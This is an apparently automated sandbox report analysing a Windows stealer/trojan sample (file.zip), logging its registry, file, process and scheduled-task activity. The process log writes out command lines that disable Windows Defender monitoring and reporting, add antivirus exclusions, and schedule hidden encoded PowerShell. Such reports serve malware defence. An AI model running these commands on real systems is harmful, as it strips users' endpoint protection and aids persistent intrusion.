Malware Analysis Report

2025-08-10 23:14

Sample ID 221031-1zkenaedem
Target file.zip
SHA256 a8f85ce5a2d7c22a8687252c1c1ff77180f0fe2d101d0d54e00a863d42b3abac
Tags
evasion spyware stealer trojan discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a8f85ce5a2d7c22a8687252c1c1ff77180f0fe2d101d0d54e00a863d42b3abac

Threat Level: Known bad

The file file.zip was found to be: Known bad.

Malicious Activity Summary

evasion spyware stealer trojan discovery

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Executes dropped EXE

Blocklisted process makes network request

Checks BIOS information in registry

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Drops desktop.ini file(s)

Drops Chrome extension

Checks installed software on the system

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-10-31 22:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:08

Platform

win7-20220812-en

Max time kernel

153s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SvbbHukzU\TThBQi.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 1424 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 544 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1252 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1616 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1296 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 824 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1616 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1296 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gGPOIrlNR" /SC once /ST 18:54:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gGPOIrlNR"

C:\Windows\system32\taskeng.exe

taskeng.exe {A5E5AC8B-FE41-4058-B00D-9DFC649AA1A7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

